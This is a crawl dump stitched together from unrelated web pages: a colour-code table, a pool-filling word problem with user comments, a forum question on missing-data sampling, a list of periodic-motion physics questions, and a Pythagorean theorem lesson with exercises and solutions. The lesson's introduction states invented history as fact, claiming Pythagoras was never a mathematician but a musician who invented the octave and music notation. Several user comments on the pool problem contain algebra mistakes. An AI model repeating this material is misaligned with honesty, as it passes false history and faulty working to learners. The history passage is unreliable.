#14998d\n``#14998d` `rgb(20,153,141)``\n• #0da092\n``#0da092` `rgb(13,160,146)``\n• #07a698\n``#07a698` `rgb(7,166,152)``\n``#00ad9d` `rgb(0,173,157)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00ad9d is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
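The RGB and HSL figures tabulated above for #00ad9d can be cross-checked with Python's standard colorsys module. This is only an illustrative verification, not how the site generates its tables.

```python
import colorsys

hex_code = "00ad9d"
r, g, b = (int(hex_code[i:i + 2], 16) for i in (0, 2, 4))   # hex -> 8-bit RGB
print(r, g, b)                                              # 0 173 157

# colorsys works on 0..1 floats and returns HLS (order: hue, lightness, saturation)
h, l, s = colorsys.rgb_to_hls(r / 255, g / 255, b / 255)
print(round(h * 360, 1), round(s * 100, 1), round(l * 100, 1))  # 174.5 100.0 33.9
```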
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.53034216,"math_prob":0.8518716,"size":3673,"snap":"2019-13-2019-22","text_gpt3_token_len":1611,"char_repetition_ratio":0.13682202,"word_repetition_ratio":0.011111111,"special_character_ratio":0.54696435,"punctuation_ratio":0.23276836,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9901129,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-26T21:03:20Z\",\"WARC-Record-ID\":\"<urn:uuid:f4b6556e-a8b7-41f1-abda-9084c8861f0d>\",\"Content-Length\":\"36377\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2699a68b-3eeb-4f85-9d2e-d5eed5fc6d57>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac8fb03e-07ff-4d6c-af7d-805e1fd8f972>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00ad9d\",\"WARC-Payload-Digest\":\"sha1:HEVTFAG6IVWRZEVZETKWWLOFCCBJGL6R\",\"WARC-Block-Digest\":\"sha1:LP7EJVCKYBEGVUWDQDLFQLIPQ6YFROPA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912206016.98_warc_CC-MAIN-20190326200359-20190326222359-00184.warc.gz\"}"}
https://www.hackmath.net/en/math-problem/438
[ "# Pool\n\nIf water flows into the pool by two inlets, fill the whole for 19 hours. The first inlet filled pool 5 hour longer than the second. How long pool take to fill with two inlets separately?\n\nt1 =  40.66 h\nt2 =  35.66 h\n\n### Step-by-step explanation:\n\nOur quadratic equation calculator calculates it.", null, "Did you find an error or inaccuracy? Feel free to write us. Thank you!", null, "Math student\n1/t1+1/(t1-10)=1/18\nmultiply each term by18(t1)(t1-10)\nthat results in\n18(t1-10)+18t1=t1(t1)(t1)-10t1\nusing the quadratic formula results in t1=-49.6 and 3.63\n\n2 years ago  2 Likes", null, "Dr Math\nright side of equation is wrong - should be t1*(t1-10) = t12 - 10*t1 now t13-10t1", null, "Math student\nthe problems seems to have changed - - - t2 is now equal t1-6\n\ntherefore 1/t1+1/(t1-6)=1/18\nmultiplying each term by18(t1)(t1-6) ==== 18(t1-6)+18t1=t1(t1-6), simplifying further 18t1-108+18t1=t12-6t1\nor 0=t12-6t1-18t1+108\ngraphing y=18(t1-6)+18t1-t1(t1-6) results in t1=39.25 hours and t2=39.25-6=33.25 hours (same as your NEW answer!!!!", null, "Tips to related online calculators\nLooking for calculator of harmonic mean?\nLooking for a statistical calculator?\nLooking for help with calculating roots of a quadratic equation?\nDo you have a linear equation or system of equations and looking for its solution? Or do you have a quadratic equation?\nTip: Our volume units converter will help you with the conversion of volume units.\nDo you want to convert time units like minutes to seconds?\n\n## Related math problems and questions:\n\n• Two pipes", null, "How long will the pool be filled with a double supply pipe if it takes the pool to fill the first pipe by 4 hours longer and the second pipe 9 hours longer than both pipes open at the same time?\n• Water pool", null, "Pool with volume 990hl completely filled, if water flows by one tap 8 hours and by second tap 6 hours. First tap give 10hl more than second per hour. How many hl flows in each of them in an hour?\n• Water reservoir", null, "The water reservoir is filled through one inlet 4 hours later than both together, then another inlet 9 hours later. For how long is filled by each separately?\n• Tributaries", null, "The first tributary fill pool with water in 15 hours. The second tributary fill pool in 10 hours. For how many hours the pool is filled with both tributaries?\n• Four pavers", null, "Four pavers would pave the square in 18 days. How many pavers do you need to add to done work in 12 days?\n• Three pumps", null, "We are filling the pool. The first pump would be filled in 12 hours, the second pump in 15 hours. If all three pumps were running at the same time, it would fill the pool for 4 hours. How long would the pool fill only with the third pump?\n• The dam", null, "The water reservoir is filled with first tributary for 25 hours second tributary for 35 hours. Some time were both inlets open, then a second tributary closed and the tank was filled in four hours. What time water flowed from both tributaries? (Expressed\n• The pool", null, "The pool contains 220 m3 of water. The pool can be emptied either: a) 10 hours of pipe B and 8 hours of pipe A, or b) 10 hours of pipe A and 7 hours of pipe B. How many cubic meters of water will flow in 1 hour from pipe A and how many from pipe B?\n• Tank No 8", null, "Tank is filled by one inlet valve with a flow rate of 12 liters per second in 72 minutes. 
How long take the tank to fill, if we open half an hour after one more inlet?\n• Pool", null, "Pool is filled with two water supply. The first supply fill pool for nine hours, the second for six hours. How many hours will take fill the pool when the water flows in through the first supply 3 hours and then we will open a second supply?\n• 4 pipes", null, "The tank flows out by 4 pipes in 6 hours 120 hl water. How much water flows out of 5 pipes of the same diameter in 14 hours?\n• Speed of Slovakian trains", null, "Rudolf decided to take the train from the station 'Ostratice' to 'Horné Ozorovce'. In the train timetables found train Os 5409 : km 0 Chynorany 15:17 5 Ostratice 15:23 15:23 8 Rybany 15:27 15:27 10 Dolné Naštice 15:31 15:31 14 Bánovce nad Bebravou 15:35 1\n• Tributaries", null, "We can fill the pool with two different tributaries. The first inflow would fill the pool in 18 hours, both in 6 hours. How many hours would the pool fill with a second inflow?\n• Two pipes", null, "One pipe fill one-fifth volume 20 minutes before by second one. The two pipes together will fill the tank in two hours. How long is will fill tank each pipe separately?\n• Pumps 3", null, "Two pumps of the same power fill the garden pool for 10 hours. How many of these pumps would have to use if we want to shorten the filling of the pool to four hours?\n• Pool 2", null, "The first supply by the pool fill for five hours and the second fill for six hours, drain should be drained for 15 hours. For how many hours the pool is full, when we open both inlet now and outlet open two hours later?\n• Oil tank and pipes", null, "The underground oil tank can be filled by two oil pipelines. The first is filled in 72 hours and the second in 48 hours. How many hours from the moment when first pipeline began to fill the oil is it necessary to start filling it with the second to fill i" ]
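For the lead "Pool" problem, substituting t1 = t2 + 5 into 1/t1 + 1/t2 = 1/19 gives the quadratic t2^2 - 33*t2 - 95 = 0, whose positive root yields the published answers. A short sketch with the plain quadratic formula; the variable names are mine, not the solver's.

```python
import math

together = 19   # hours for both inlets running at once
extra = 5       # the first inlet needs 5 hours more than the second

# 1/(t2 + extra) + 1/t2 = 1/together  =>  t2**2 + (extra - 2*together)*t2 - together*extra = 0
a, b, c = 1, extra - 2 * together, -together * extra   # here: 1, -33, -95
t2 = (-b + math.sqrt(b * b - 4 * a * c)) / (2 * a)     # keep the positive root
t1 = t2 + extra
print(round(t1, 2), round(t2, 2))                      # 40.66 35.66
```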
[ null, "https://www.hackmath.net/img/38/pool.jpg", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/thumb/13/t_7613.jpg", null, "https://www.hackmath.net/thumb/48/t_2048.jpg", null, "https://www.hackmath.net/thumb/2/t_2002.jpg", null, "https://www.hackmath.net/thumb/40/t_2640.jpg", null, "https://www.hackmath.net/thumb/59/t_8159.jpg", null, "https://www.hackmath.net/thumb/4/t_7404.jpg", null, "https://www.hackmath.net/thumb/42/t_2442.jpg", null, "https://www.hackmath.net/thumb/0/t_7400.jpg", null, "https://www.hackmath.net/thumb/93/t_2093.jpg", null, "https://www.hackmath.net/thumb/93/t_2993.jpg", null, "https://www.hackmath.net/thumb/90/t_1690.jpg", null, "https://www.hackmath.net/thumb/3/t_3.jpg", null, "https://www.hackmath.net/thumb/31/t_13231.jpg", null, "https://www.hackmath.net/thumb/25/t_2625.jpg", null, "https://www.hackmath.net/thumb/78/t_1878.jpg", null, "https://www.hackmath.net/thumb/88/t_1288.jpg", null, "https://www.hackmath.net/thumb/54/t_4954.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92863244,"math_prob":0.9123789,"size":5997,"snap":"2021-43-2021-49","text_gpt3_token_len":1683,"char_repetition_ratio":0.14133155,"word_repetition_ratio":0.20670392,"special_character_ratio":0.28580958,"punctuation_ratio":0.09287926,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98831624,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T05:59:55Z\",\"WARC-Record-ID\":\"<urn:uuid:8437fb06-af70-44c5-9167-88f60f606f02>\",\"Content-Length\":\"93617\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71ccb74e-0eec-4d4b-9726-47291fad982f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0f70bd75-3e7d-4008-9753-bc86af78896a>\",\"WARC-IP-Address\":\"172.67.143.236\",\"WARC-Target-URI\":\"https://www.hackmath.net/en/math-problem/438\",\"WARC-Payload-Digest\":\"sha1:W5FMMMARL55HB4S7WQZSRUF3N5ML66P3\",\"WARC-Block-Digest\":\"sha1:NNR2SJQI5KILOUZNG5TCLA4BJFP5SVMX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587799.46_warc_CC-MAIN-20211026042101-20211026072101-00074.warc.gz\"}"}
https://able2know.org/topic/355795-1
[ "0\n\n# sampling from conditonal distribution of missing random vector given a complete random vector\n\nTue 29 Nov, 2016 02:50 pm\nsuppose i have complete random variable vector $Y$ with size $n$\nand this random vector $Y$ is partitioned into observed and missing vector\nas follows $Y =[Y_{obsv}, Y_{mis}]$, where missing is foloowing a dropout pattern, $Y_{mis}$ is of size $s$ and $Y_{obsv}$ is of size $n-s$ and we are interested of the first dropout which its missing is rely on the previous obsereved value and the missing value itselef via a logit model for probabiltiy\nof missing at occasion $i =1 :n$\n$logit(p_{i}) = \\phi_{1} +\\phi_{2}Y_{i-1}+\\phi_{3}Y_{i}$, Also missing is based on missing-mechanism $R_{i}$ which is equal one if value is missing and equal zero if value is observed. the missing mechanism is distributed as multi-nomial. Also The complete Vector $Y$ has the following relation $Y = X+Z$, WHERE $X$ and $z$ are independent random vector variables and $X$ is distributed as multivariate noraml and $z$ is distributed as multivariate t\n• Topic Stats\n• Top Replies" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9054061,"math_prob":0.9998314,"size":960,"snap":"2019-51-2020-05","text_gpt3_token_len":273,"char_repetition_ratio":0.13179916,"word_repetition_ratio":0.0,"special_character_ratio":0.27708334,"punctuation_ratio":0.05376344,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999572,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T18:25:13Z\",\"WARC-Record-ID\":\"<urn:uuid:51945fe9-a295-488a-a078-4f703520fd66>\",\"Content-Length\":\"17317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d80f1b00-e431-4857-bc46-a57095d11b02>\",\"WARC-Concurrent-To\":\"<urn:uuid:21181f12-19a7-467e-b406-6e71d4116bca>\",\"WARC-IP-Address\":\"104.26.0.81\",\"WARC-Target-URI\":\"https://able2know.org/topic/355795-1\",\"WARC-Payload-Digest\":\"sha1:DTDAWOCTW5F5TJTHV3HLWNMAVMFEEJSR\",\"WARC-Block-Digest\":\"sha1:5PYLEF6WD2BG35ZDPREFDIK5VKPSBO4R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541288287.53_warc_CC-MAIN-20191214174719-20191214202719-00410.warc.gz\"}"}
https://brainmass.com/physics/periodic-motion/pg3
[ "Explore BrainMass\nShare\n\nPeriodic Motion\n\nSimple Harmonic Motion - Mass and Period\n\nThe position of a mass oscillating on a spring is given by x=(5.2 cm)cos[2pi t/(0.54 s)]. (a) What is the period of this motion? (b) When is the mass first at the position x=0?\n\nPeriod of Pendulum\n\nThe period T (in seconds) of a simple pendulum is a function of its length l (in feet), given by: T(l)=2pie sqrt 1/g Express the length l as a function of the period T.\n\nA tranverse traveling\n\nA tranverse traveling wave is described by the equation y(x,t) = 10 sin(8 pie + pieT), where x and y are in meters and t in seconds. the wavelength and freaquency of the wave are a. .25m and .5 hz b. 4m and .5hz c. .25m and 2hz d. 4m and 2hz\n\nPendulum Amplitude and Period\n\nWhen the amplitude of a pendulum decreases to half its initial value, the period will have: a. Halved b. Doubled c. Remain the same\n\nFinding the radius of a circle\n\nPlease see the attachment. I do not have notes as to how to determine the radius, would you please walk me through the steps?\n\nS and P waves from an earthquake travel at different speeds and this difference helps in the determination of the earthquake \"epicenter\", (where the disturbance took place). (a) Assuming typical speeds of 9.0km/s and 5.5 km/s for P and S waves, respectively, how far away did the earthquake occur if a particular seismic statio\n\nWaves, wave speed/type\n\nA fisherman notices that wave crests pass the bow of his anchored boat every 4.0seconds. He measures the distance between two crests to be 9.0 m. How fast are the waves traveling? **please explain this in the simplest, least confusing way....thank you so much :)\n\nEquation of a particle on a spring\n\nA particle with a mass of .500 kg is attached to a spring with a force constant of 50.0 N/m. At time t=0 the particle has its maximum spreed of 20.0 m/s and is moving to the left. (a) Determine the particle's equation of motion, specifying its position as a function of time. (b) Where in the motion is the potential energy thre\n\nMass of a Pendulum\n\nPlease do not place your response in a .pdf or .cdx format, but Word documents are okay. Thanks! Here's the actual problem: Does the mass of a pendulum (brass vs aluminum) affect the period? Explain.\n\nWhat is the amplitude of the oscillation?\n\nA. What is the amplitude of the oscillation shown in the figure? B. What is the frequency of this oscillation? C. What is the phase constant?\n\nPeriodic Motion of Vibrating Spring\n\nA spring vibrates with a frequency of 3.0 Hz when a weight of 0.50 kg is hung from it. What will its frequency be if only 0.35 kg hangs from it?\n\nA Fisherman's Scale: Spring Constants and Vibrations\n\nA fisherman's scale stretches 2.8cm when a 3.7kg fish hangs from it. (a) What is the spring constant? (b) What will be the amplitude and frequency of vibration if the fish is pulled down 2.5cm more and released so that it vibrates up and down? *please explain this as simply and clearly as possible, thank you so much :)\n\nAmplitude of Spring Without Friction\n\nA 2.00 kg object attached to a spring moves without friction and is driven by an external force given by: F = (3.00N) sin(2t) If the force constant of the spring is 20.0N/m, determine a) the period b) the amplitude of the motion.\n\nWave Direction and Wind\n\nOn a rather cold and rainy day we observed that the wind was blowing from the NE and the waves were traveling in all directions. 
Why would this be?\n\nDynamics for Unit Mass Moving\n\nA particle of unit mass moving on the x axis has equation of motion (FUNCTION1) and the initial conditions are (FUNCTION2). show that (FUNCTION3) and deduce that the motion is an oscillation between x=1 and x=3 with period (FUNCTION4). By making the substitution (FUNCTION5) or otherwise show that (FUNCTION6). (PLEASE SEE ATTA\n\nFinding the Spring Constant\n\nA 10-cm-long spring is attached to the ceiling. When a 2.0 kg mass is hung from it, the spring stretches to a length of 15 cm. (a) What is the spring constant k? (b) How long is the spring when a 3.0 kg mass is suspended from it?\n\nPhysics: Spring Scale Question\n\nA 6.30 kg mass hanging from a spring scale is slowly lowered onto a vertical spring, as shown in the figure (*please see attachment) A. What does the spring scale read just before the mass touches the lower spring? B. The scale reads 16.0 N when the lower spring has been compressed by 2.70 cm. What is the value of the spring\n\nInductor and capacitor in a series or parallel\n\nHi. Can someone please help me with this conceptual question? An inductor and a capacitor are to be connected to a generator. Will the generator supply more current at a low frequency if the inductor and capacitor are connected in series or in parallel? Thank you.\n\nTraveling wave from known amplitude, frequency and wavelength.\n\nA wave traveling on a wire has a frequency f= .8 cy/sec, an amplitude Y= .18 m and a wavelength L= 4.0 m. At a time t= .25 sec, find the x coordinates of all the crests.\n\nSimple pendulum changes length during half of one cycle.\n\nA simple pendulum consists of a small marble suspended from nail #1 by a cord whose length is 12 m. Nail #1 is 6 m below nail #1, so that as the pendulum swings, the cord is caught on nail #2 when the cord is vertical. The marble is pulled a small distance from center and released at rest. see ATTACHMENT for a diagram of the e\n\nHarmonic oscillator and the first excited state\n\nFind the question attached. The first excited states of the harmonic oscillators is see attached (a) Fine the normalization constant C_1- (b) Find the expectation values of <x p> and <p x> should that see attached\n\nPractice on Sinusoidal Wave\n\nI am given a V peak of 3.98v, and a V trough of 1.49v. I found the Amplitude to be 2.49. I am now asked to find V e = V rms and I am not sure what is being asked or how to do the problem. Please provide assistance.\n\nFinding parameters of a wave\n\nFind the amplitude, period and the phase and then sketch (i) f(x) = 2 cos x + Pi (ii) f(x) = 2 sin (2x+ (Pi/2))\n\nFinding angle and magnitude\n\nIn an assembly operation, a robot moves an object first straight upwards and then to the east, around an arc forming on quarter of a circle of radius 4.80 that lies in an east-west vertical plane. The robot then moves the object upward and to the north, through a quarter of a circle of radius 3.70 cm that lies in a north south\n\nFrame of Pivot Axis Corner\n\nSEE ATTACHMENT #1 for a diagram of the given parameters. A rectangular frame is made from two thin, uniform bars of length L= 4 m, mass A= 6 kg, and two of length W= 3 m, mass B= 1.5 kg. The frame is placed on a pivot axis at one corner and executes SHM about that axis. Find the period of this SHM oscillation.\n\nCalculating Moment of Inertia: Example Problem\n\nAn irregular piece of sheet metal mounted on a pivot at a distance of .62 m from the cm. 
About this pivot point, it oscillates with SHM with a period measured at 2.25 seconds. Part A: Find the moment of inertia about the pivot axis. Part B: Find the moment of inertia about the cm axis.\n\nFrequency of an oscillating spring using Hooke's Law\n\nSee the attached file.\n\nMass and spring properties when in simple harmonic motion.\n\nA mass sits on a frictionless table. It is attached to a wall by a spring. The mass is initially located at x = 0 when the spring is unstretched (equilibrium position). You pull the mass away from the equilibrium position, out to x = A, and then release it. The mass then oscillates horizontally back and forth in simple harmonic\n\nSpeed and wavelength of water waves given distance\n\nWater waves in a lake travel 4.4 m in 1.8s. The period of oscillation is 1.2 s. a. What is the speed of water waves? b. What is their wavelength?" ]
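The BrainMass items above are posed without worked answers. As a single hedged illustration, the "fisherman's scale" problem (a 2.8 cm stretch under a 3.7 kg fish, then a further 2.5 cm pull) follows directly from Hooke's law and the SHM frequency formula; the value of g is my assumption, not given on the page.

```python
import math

g = 9.81    # m/s^2, assumed standard value
m = 3.7     # kg, mass of the fish
x = 0.028   # m, stretch produced by the fish's weight

k = m * g / x                         # Hooke's law: m*g = k*x  ->  k = m*g/x
f = math.sqrt(k / m) / (2 * math.pi)  # SHM frequency: f = (1/(2*pi)) * sqrt(k/m)

print(round(k), "N/m")    # ~1296 N/m
print(round(f, 2), "Hz")  # ~2.98 Hz; the amplitude is the extra 2.5 cm pull
```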
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9246012,"math_prob":0.9768571,"size":6786,"snap":"2019-26-2019-30","text_gpt3_token_len":1776,"char_repetition_ratio":0.12872308,"word_repetition_ratio":0.06041828,"special_character_ratio":0.2605364,"punctuation_ratio":0.11583769,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99669284,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-17T08:13:28Z\",\"WARC-Record-ID\":\"<urn:uuid:5b8550f7-54dc-4aed-97dd-e9c3426de6ae>\",\"Content-Length\":\"100008\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3883d30-44f8-47a4-9132-27bb7551d2fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:3edc9f17-b60d-4600-8e1e-e8277b9cfaab>\",\"WARC-IP-Address\":\"65.39.198.123\",\"WARC-Target-URI\":\"https://brainmass.com/physics/periodic-motion/pg3\",\"WARC-Payload-Digest\":\"sha1:OYIMNLGCA3RQQDJT2TF72R5SI2E7YJYC\",\"WARC-Block-Digest\":\"sha1:LPPV6RAMULUH5TNEI4HQASQIVNGPVTAE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998440.47_warc_CC-MAIN-20190617063049-20190617085049-00347.warc.gz\"}"}
https://www.teachoo.com/2224/586/Example-20---Find-solution-of-sin-x----root-3-2---Class-11/category/Examples/
[ "", null, "", null, "1. Chapter 3 Class 11 Trigonometric Functions (Term 2)\n2. Serial order wise\n3. Examples\n\nTranscript\n\nExample 20 Find the solution of sin x = – √3/2 Let sin x = sin y also sin x = (−√3)/2 From (1) and (2) sin y = (−√3)/2 sin y = sin 4/3 π ⇒ y = 4/3 π Step 2 Since sin x = sin y General Solution is x = n π + (–1)n y where n ∈ Z Putting y = 4𝜋/3 x = n π + (–1)n 4/3 π where n ∈ Z", null, "" ]
[ null, "https://d1avenlh0i1xmr.cloudfront.net/07b429ce-fef2-4975-887b-56a211dd1bc6slide1.jpg", null, "https://d1avenlh0i1xmr.cloudfront.net/26f2f2c7-7f38-4078-acb3-3d505095296cslide2.jpg", null, "https://delan5sxrj8jj.cloudfront.net/misc/Davneet+Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5923642,"math_prob":0.9999887,"size":985,"snap":"2021-43-2021-49","text_gpt3_token_len":326,"char_repetition_ratio":0.33944955,"word_repetition_ratio":0.114583336,"special_character_ratio":0.34213197,"punctuation_ratio":0.005263158,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99973756,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,6,null,6,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-24T19:13:15Z\",\"WARC-Record-ID\":\"<urn:uuid:c856464c-c3f2-4a93-87f4-cfb45319fa5f>\",\"Content-Length\":\"63906\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:568f4b23-a708-49d2-ae59-f5afe805705d>\",\"WARC-Concurrent-To\":\"<urn:uuid:9724355e-a27e-4d09-b55f-c12c08b755d9>\",\"WARC-IP-Address\":\"23.22.5.68\",\"WARC-Target-URI\":\"https://www.teachoo.com/2224/586/Example-20---Find-solution-of-sin-x----root-3-2---Class-11/category/Examples/\",\"WARC-Payload-Digest\":\"sha1:HQQ7654OLYMZMMWP45N6OD5ZFKMNNRND\",\"WARC-Block-Digest\":\"sha1:KDEVJ7MWT3DTYAOAK2WWMOW6L5VMJGXF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587593.0_warc_CC-MAIN-20211024173743-20211024203743-00045.warc.gz\"}"}
http://www.the-mathroom.ca/plgm/plgm2.2/plgm2.2.htm
[ "The Pythagorean Theorem\n\nPythagoras\n\nMost math text books preceded this theorem with an introduction to the ancient Greek named Pythagoras who contributed this most famous triangle theorem. They all claim that he was a great mathematician -- the founder of the Pythagorean School of mathematics. But that's not the true story!! Pythagoras was never a mathematician. He was a frustrated musician. He composed songs, but, since he lived at a time before anyone had invented a language with which to write music, he was unable to jam with his buddies on his original compositions -- something musicians and especially composers, have loved to do throughout history. So, Pythagoras went to Egypt to study math because he realized that some new version of algebra -- which is a language -- could be transformed into code to write music.\n\nAfter his studies in Egypt, Pythagoras returned to Greece where he established the Pythagorean School -- a school of music -- not mathematics. It was here that he invented the octave and the first version of the notation system we still use today to write music.\n\nIn this lesson, we discover his most famous mathematical theorem on right triangles which forms the basic theory of the branch of math called Trigonometry.\n\n.\n\nThe Pythagorean Theorem\n\nIn a right triangle, the square on the hypotenuse\nis equal to the sum of the squares on the other two sides.", null, "So, in the right-angled triangle ABC, c2 = a2 + b2\n\nThis statement can always be written in its two other forms:\n\nc2 – a2 = b2\n\nc2 – b2 = a2\n\nSo, given the lengths of two sides of a right triangle,\nwe can always find the length of the third side.\n\nNote: Don't forget to take the square root of , and\n\nNote: the hypotenuse is always the longest side facing the 90° angle.\nThe sides around the right angle are called legs.\nEither one can be considered the base or the height (altitude) when we need area.\n\n.\n\nExamples:\n\nFind the missing side in these right triangles.", null, ".\n\nPractice\n\n1) Find the missing side in these right triangles. Round to the nearest hundreth.", null, "2) Which of these are Pythagorean triples? 
Justify your answer.\n\n a) 3, 4, and 6 b) 15, 17 and 8 c) 13, 5 and 12 d) 8, 9 and 11\n\n3) Make a diagram and solve each of these word problems.\n\na) A 7-meter ladder is leaning against the wall of a house so that\nthe foot of the ladder is 2 meters from the wall.\nHow far up the wall is the top of the ladder?\n\nb) A ship leaves New York harbour and sails due East at 20 km/h for 2 hours.\nIt then turns directly south and sails at 25 km/h for 1 hour.\nHow far is the ship from New York harbour?\n\nc)", null, "The base of the great Pyramid of Khufu is a square with sides 230 m long.\nWhat is the length of the diagonal of the base?\n\n4) Find x to the nearest tenth of a centimeter.", null, ".\n\nSolutions\n\n1) a)", null, "b) This is the 3, 4, 5 triangle doubled so x = 10\n\nc)", null, "d) The Pythagorean triple 5, 12, 13 makes x = 12.\n\n.\n\n2)\n\n a) 3, 4, and 6 -- NO6² is not = 3² + 4² b) 15, 17 and 8 -- YES17² = 8² + 15² c) 13, 5 and 12 -- YES13² = 5² + 12² d) 8, 9 and 11 -- NO11² is not = 8² + 9²\n\n.\n\n3) a)", null, "b)", null, ".\n\n3 c) Since when we draw the diagonal, we make an isosceles right triangle with\nequal sides = 230 meters, the hypotenuse =", null, ".\n\n.\n\n4) Find x to the nearest tenth of a centimeter.", null, "Since the small triangle on the left is the famous 3, 4, 5 right triangle,\nx² = 6² + 5² which means", null, ".\n\n(all content © MathRoom Learning Service; 2004 - )." ]
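Practice question 2 and its solution key amount to testing whether the square of the largest number equals the sum of the squares of the other two. The sketch below reproduces the lesson's YES/NO answers; the helper-function name is mine, not the lesson's.

```python
def is_pythagorean_triple(a, b, c):
    """True when the largest value squared equals the sum of the squares of the other two."""
    a, b, c = sorted((a, b, c))      # put the candidate hypotenuse last
    return a * a + b * b == c * c

for triple in [(3, 4, 6), (15, 17, 8), (13, 5, 12), (8, 9, 11)]:
    print(triple, is_pythagorean_triple(*triple))
# (3, 4, 6) False, (15, 17, 8) True, (13, 5, 12) True, (8, 9, 11) False
```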
[ null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1a8.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1a9.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1aa.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/GrtPyramid2crop.jpg", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ab.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ac.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ad.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1ae.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1af.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b0.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b1.png", null, "http://www.the-mathroom.ca/plgm/plgm2.2/4c59d1b2.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9201663,"math_prob":0.9768514,"size":3407,"snap":"2019-13-2019-22","text_gpt3_token_len":935,"char_repetition_ratio":0.12518366,"word_repetition_ratio":0.029850746,"special_character_ratio":0.28324038,"punctuation_ratio":0.11251758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99285644,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T02:23:46Z\",\"WARC-Record-ID\":\"<urn:uuid:30f45900-ea88-4bf8-aebd-ea66cebf3270>\",\"Content-Length\":\"8064\",\"Content-Type\":\"application/http; 